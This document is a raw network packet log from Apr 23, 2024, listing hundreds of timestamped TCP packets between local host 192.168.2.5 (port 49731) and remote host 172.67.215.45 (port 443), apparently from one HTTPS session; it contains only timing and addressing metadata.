Apr 23, 2024 07:53:29.303519011 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.303563118 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.303570986 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.303597927 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.303623915 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.304836988 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.304852962 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.304908037 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.304913998 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.304945946 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.304970026 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.305963993 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.305980921 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.306072950 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.306080103 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.306128979 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.307807922 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.307826996 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.307904005 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.307913065 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.307955027 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.309582949 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.309601068 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.309663057 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.309672117 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.309717894 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.311395884 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.311412096 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.311472893 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.311480999 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.311533928 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.312943935 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.312961102 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.313019037 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.313025951 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.313071012 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.313376904 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.313395023 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.313437939 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.313445091 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.313481092 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.313543081 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.313802004 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.313819885 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.313864946 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.313882113 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.313947916 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.314002991 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.314316034 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.314333916 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.314388037 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.314395905 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.314431906 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.314857006 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.314874887 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.314924002 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.314929962 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.314955950 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.314984083 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.315480947 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.315500021 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.315552950 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.315560102 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.315609932 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.316041946 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.316059113 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.316118956 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.316124916 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.316174984 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.316641092 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.316658020 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.316706896 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.316715002 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.316751003 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.317100048 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.317117929 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.317153931 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.317161083 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.317179918 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.317200899 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.317509890 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.317527056 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.317581892 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.317589998 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.317622900 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.318020105 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.318037987 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.318082094 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.318089008 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.318109035 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.318129063 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.318434000 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.318449974 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.318499088 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.318506956 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.318533897 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.318844080 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.318865061 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.318906069 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.318912983 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.318943977 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.319310904 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.319328070 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.319375992 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.319384098 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.319417000 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.319686890 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.319705009 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.319747925 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.319755077 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.319812059 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.320141077 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.320161104 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.320214033 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.320220947 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.320231915 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.320256948 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.320610046 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.320626974 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.320674896 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.320682049 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.320720911 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.320985079 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.321002007 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.321047068 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.321053028 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.321079969 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.321635962 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.321652889 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.321698904 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.321706057 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.321737051 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.322143078 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.322161913 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.322199106 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.322205067 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.322288036 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.322288036 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.322777033 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.322794914 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.322901011 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.322901011 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.322907925 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.322947025 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.323240995 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.323256969 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.323299885 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.323306084 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.323342085 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.323749065 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.323765039 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.323812962 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.323821068 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.323844910 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.324306965 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.324328899 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.324361086 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.324368954 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.324393988 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.324414968 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.324786901 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.324803114 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.324845076 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.324851990 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.324868917 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.324892998 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.325254917 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.325272083 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.325309038 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.325314045 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.325340986 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.325359106 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.325965881 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.325983047 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.326034069 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.326040983 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.326082945 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.326940060 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.326960087 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.326998949 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.327004910 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.327028990 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.327045918 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.327876091 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.327892065 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.327936888 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.327944040 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.327975035 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.328824043 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.328840971 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.328876972 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.328883886 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.328907967 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.328926086 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.329690933 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.329708099 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.329750061 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.329756975 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.329787016 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.330615044 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.330651999 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.330674887 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.330682039 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.330702066 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.330715895 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.331526995 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.331542969 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.331589937 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.331598043 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.331629038 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.332477093 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.332494974 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.332545996 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.332554102 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.332588911 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.333287954 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.333303928 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.333353043 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.333360910 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.333401918 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.334177971 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.334193945 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.334228039 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.334239960 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.334254026 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.334275007 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.335169077 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.335185051 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.335239887 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.335247993 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.335285902 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.336002111 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.336019993 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.336070061 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.336076021 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.336110115 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.336110115 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.336918116 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.336934090 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.336975098 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.336988926 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.336999893 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.337018967 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.337837934 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.337853909 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.337896109 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.337904930 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.337938070 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.338776112 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.338794947 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.338871002 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.338879108 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.338917971 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.339505911 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.339523077 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.339574099 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.339582920 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.339610100 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.339637995 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.340270042 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.340286970 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.340341091 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.340347052 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.340379953 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.340404987 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.341206074 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.341228008 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.341321945 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.341329098 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.341386080 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.342128038 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.342144966 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.342205048 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.342211962 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.342242956 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.342267036 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.343009949 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.343028069 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.343086004 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.343094110 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.343126059 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.343149900 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.343981028 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.343998909 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.344065905 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.344074965 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.344125986 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.344697952 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.344715118 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.344777107 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.344784975 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.344824076 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.345583916 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.345601082 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.345675945 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.345684052 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.345725060 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.346930027 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.346946001 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.347055912 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.347063065 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.347110033 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.347439051 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.347455025 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.347724915 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.347732067 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.347774029 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.347817898 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.347834110 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.347907066 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.347913980 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.347965002 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.348450899 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.348468065 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.348594904 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.348603964 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.348663092 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.349575043 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.349590063 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.349636078 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.349642992 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.349658966 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.349680901 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.350366116 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.350383043 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.350421906 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.350430012 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.350445986 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.350461960 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.350714922 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.350732088 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.350769043 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.350786924 CEST	443	49731	172.67.215.45	192.168.2.5
